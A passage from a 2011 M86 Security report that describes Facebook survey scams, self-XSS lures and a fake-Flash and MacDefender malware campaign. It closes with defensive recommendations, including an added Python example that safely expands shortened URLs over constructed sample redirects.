Figure 32: Facebook User is Tricked into Submitting a Comment “I Love Southwest” in Order to Spread This Scam

Some of the scams offered users free airline tickets. Others revealed content, such as a video unveiling Apple’s new iPhone, the iPhone 5:

Figure 33: Facebook User is Asked to Verify CAPTCHA Terms Like ‘Crazy’ and ‘Incredible’

Rogue Application Features

Scams took a variety of forms in the first half of 2011. Some used built-in features of the Facebook application platform to push scams out en masse.

Figure 34: Facebook Application Requests Access to Photos and Videos to Spread the Photo-tagging Scam

A lesser-known feature of the Facebook application platform includes access to the Facebook Chat feature:

Figure 35: Rogue Application is Granted Access to Facebook Chat

This turned out to be a boon for scammers, who began using chat to direct users to their scam sites.

Figure 36: Facebook Chat Message Linking to a Scam Site

Self XSS (Cross-site Scripting)

In May, scammers found a way to use a cross-site scripting vulnerability via Facebook. This required the user to paste JavaScript code into their browser’s address bar. Scams varied from Osama Bin Laden’s death video to profile stalkers to adding a Dislike button.

Figure 37: Facebook Page Encourages Users to Paste JavaScript Code into Their Browser’s Address Bar

Surveys: How Scammers Make Their Money

All of these scams lead Facebook users to pages asking them to complete a survey. The survey is presented as a “requirement” for getting access to videos, free airline tickets or enabling features on Facebook such as the Dislike button.

Figure 38: Scammers Convince Users That They Need to Verify They are Humans by Filling Out a Survey

Each user that completes one of these surveys results in a payout from an affiliate program. We do not know for sure how much each affiliate program pays the scammers, but the mere fact that these scams continue indicates that the money must be sufficient to keep them in business.

Malware Campaign Spreads

It was only a matter of time before these scam campaigns resulted in more than users being duped into completing surveys. Near the end of May, a malware campaign surrounding the allegations against former IMF boss Dominique Strauss-Kahn began to spread. The campaign claims to link users to a video of the alleged sexual assault against a hotel maid in New York.

Figure 39: IMF Scam Campaign Directs Users to Malicious Downloads for Both Windows and Mac Users

Users that clicked through were directed to a fake YouTube site. Windows users would be directed to a download of a malicious executable claiming to be a Flash Player installation file. Mac users would be directed to a page pushing the fake anti-virus known as MacDefender.

Figure 40: Facebook Scam Leads to MacDefender Scareware Page for Mac Users

This malware campaign spread for 72 hours before it was wiped clean from Facebook profiles, but not before thousands of Facebook users had already fallen for it. While this malware campaign was a one-off in a sea of survey scams, it is a cautionary tale. Social networking scammers are no longer content with making money from surveys. Social engineering to entice users to fill in surveys is just the beginning, and this campaign showed why Facebook and other social networks could prove to be a utopia for cybercriminals.

RECOMMENDATIONS

M86 Security recommends the following security best practices to help reduce your exposure to threats and scams:

- Review your current security products. Armed with the latest threat information, re-evaluate the security products that are being used in your organization or at home. Ask your current vendors the tough questions about exactly what they do to detect and block these threats. The solutions you use should have a solid base of reactive controls in anti-virus and URL scanning, along with proactive technologies such as real-time code analysis. Consider testing products against each other, and ensure the vendors are investing in threat research.

- Stay up to date. Keep Web browsers, add-ons/extensions, and desktop applications up to date with their latest versions. We have seen time and again that attacks target vulnerabilities found in old versions of Web browsers or applications. Organizations are not blocking the latest spam and Web threats simply because their products are not up to date. While being completely up to date with the latest patches helps to protect you and your end users from patched vulnerabilities, you will still need to remain on guard for the un-patched, zero-day vulnerabilities.

- Education is paramount. Teaching users about best practices for their everyday Internet usage is a key part of a security policy. Show them examples of social networking scams. Explain how easy it is for a computer to get infected. Encourage them to keep their applications up to date (see above). Above all else, they should be wary about clicking on any links in email, and pay close attention to the links found in search engine results and those posted by contacts on social networks.

- Consider using browser add-ons or extensions for an additional layer of security. We recommend using the NoScript extension for Mozilla Firefox, which limits the execution of JavaScript code. We also suggest using extensions that will display shortened URLs as their full URLs, making it easier to know the actual destination URL. M86 Security and other security vendors provide free tools for users to install on their personal or home computers (typically the most vulnerable). One such tool is SecureBrowsing, which analyzes links from search engine results or on Web pages to gauge their malicious nature. It also works with shortened URLs such as those found in Twitter.

- Protect your Social Networking accounts. Facebook and Twitter have added the option to use HTTPS for their services. We strongly recommend that you enable this setting on both services. To enable HTTPS for Facebook, visit http://www.facebook.com/editaccount.php and you will find the check box to Browse Facebook on a secure connection. To enable HTTPS for Twitter, visit http://twitter.com/settings/account and check the Always use HTTPS box. We also highly recommend enabling Login Notifications on Facebook, which can also be found in the same section as above.
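The recommendation above to reveal the real destination behind a shortened link can be done without a browser extension. The following is an added example, not M86 code or the SecureBrowsing tool: it walks a link's redirect chain one HEAD request at a time, so the whole chain (shortener, tracking hop, landing page) is visible to a reviewer before anyone clicks. The shortener host names, the `CONSTRUCTED_REDIRECTS` table and `fake_fetch` are made-up data so the module runs offline; `live_fetch` is the network-backed version. It also handles the cases a naive expander gets wrong: relative Location headers, redirect loops, a redirect into a non-HTTP scheme, a missing Location header, and chains that never end.

```python
"""Expand shortened URLs by walking their redirect chain with HEAD requests.

Added example illustrating the M86 recommendation on shortened URLs; this is
not M86 code. live_fetch talks to the network; CONSTRUCTED_REDIRECTS and
fake_fetch are constructed sample data so the module runs offline.
"""
from urllib.error import HTTPError
from urllib.parse import urljoin, urlsplit
from urllib.request import HTTPRedirectHandler, Request, build_opener

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
SAFE_SCHEMES = {"http", "https"}


class _NoRedirect(HTTPRedirectHandler):
    """Stop urllib from following redirects; each hop is inspected by hand."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url, timeout=10):
    """HEAD one URL; return (status, Location header or None) without following it."""
    opener = build_opener(_NoRedirect())
    req = Request(url, method="HEAD", headers={"User-Agent": "url-expander-example/0.1"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except HTTPError as err:  # urllib raises for the 3xx we refused to follow
        return err.code, err.headers.get("Location")


def expand_url(url, fetch=live_fetch, max_hops=10):
    """Follow redirects from `url` and report where they end.

    Returns {"status", "final", "chain"}; status is one of resolved, loop,
    unsafe_scheme, no_location or too_many_hops. The chain lists every URL
    visited so the tracking hops are visible, not just the last page.
    """
    chain = [url]
    seen = {url}
    current = url
    if urlsplit(current).scheme.lower() not in SAFE_SCHEMES:
        return {"status": "unsafe_scheme", "final": current, "chain": chain}
    for _ in range(max_hops):
        code, location = fetch(current)
        if code not in REDIRECT_STATUSES:
            return {"status": "resolved", "final": current, "chain": chain}
        if not location:
            return {"status": "no_location", "final": current, "chain": chain}
        nxt = urljoin(current, location)  # Location may be relative
        chain.append(nxt)
        if urlsplit(nxt).scheme.lower() not in SAFE_SCHEMES:
            # e.g. a data: or javascript: target the browser would act on, not fetch
            return {"status": "unsafe_scheme", "final": nxt, "chain": chain}
        if nxt in seen:
            return {"status": "loop", "final": nxt, "chain": chain}
        seen.add(nxt)
        current = nxt
    return {"status": "too_many_hops", "final": current, "chain": chain}


# Constructed sample data (made-up hosts) standing in for real HEAD responses.
CONSTRUCTED_REDIRECTS = {
    # shortener -> tracking hop -> relative redirect -> landing page
    "http://sho.rt/a1": (301, "http://tracker.example/r?id=7"),
    "http://tracker.example/r?id=7": (302, "/landing"),
    # two shortened links that point at each other forever
    "http://sho.rt/loop1": (302, "http://sho.rt/loop2"),
    "http://sho.rt/loop2": (302, "http://sho.rt/loop1"),
    # a redirect into a non-HTTP scheme
    "http://sho.rt/data": (302, "data:text/html,<h1>hi</h1>"),
    # a redirect with no Location header
    "http://sho.rt/broken": (302, None),
}
for _i in range(12):  # a 12-hop chain to exercise the max_hops cutoff
    CONSTRUCTED_REDIRECTS[f"http://sho.rt/h{_i}"] = (307, f"http://sho.rt/h{_i + 1}")


def fake_fetch(url):
    """Offline stand-in for live_fetch backed by the constructed table."""
    return CONSTRUCTED_REDIRECTS.get(url, (200, None))


if __name__ == "__main__":
    for link in ("http://sho.rt/a1", "http://sho.rt/loop1", "http://sho.rt/data", "http://sho.rt/h0"):
        result = expand_url(link, fetch=fake_fetch)
        print(f"{link}: {result['status']} -> {result['final']}  via {' -> '.join(result['chain'])}")
```

Using HEAD rather than GET means the expander never downloads the landing page's body, which matters when the destination is a malware download like the fake Flash Player installer described earlier. Pass `live_fetch` (the default) to inspect real links; the status values other than `resolved` are exactly the cases where a user should not click.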

ABOUT M86 SECURITY

M86 Security is the global expert in real-time threat protection and the industry’s leading Secure Web Gateway provider. The company’s hardware, virtual appliance, software, and Software as a Service (SaaS) solutions for Web and email security protect more than 25,000 customers and 26 million users worldwide. M86 products use patented real-time code analysis and behavior-based malware detection technologies as well as threat intelligence from M86 Security Labs to protect networks against new and advanced threats, secure confidential information, and ensure regulatory compliance. The company is based in Irvine, California with international headquarters in London and development centers in California, Israel, and New Zealand. For more information about M86 Security, please visit: www.m86security.com.

TRY BEFORE YOU BUY

M86 Security offers free product trials and evaluations. Simply contact us or visit: www.m86security.com/downloads.

Corporate Headquarters
8845 Irvine Center Drive
Irvine, CA 92618
United States
Phone: +1 (949) 932-1000
Fax: +1 (949) 932-1086

International Headquarters
Renaissance 2200
Basing View, Basingstoke
Hampshire RG21 4EQ
United Kingdom
Phone: +44 (0) 1256 848 080
Fax: +44 (0) 1256 848 060

Asia-Pacific
Suite 3, Level 7, 100 Walker St.
North Sydney NSW 2060
Australia
Phone: +61 (0)2 9466 5800
Fax: +61 (0)2 9466 5899

© Copyright 2011 M86 Security. All rights reserved. M86 Security is a registered trademark of M86 Security. All other product and company names mentioned herein are trademarks or registered trademarks of their respective companies.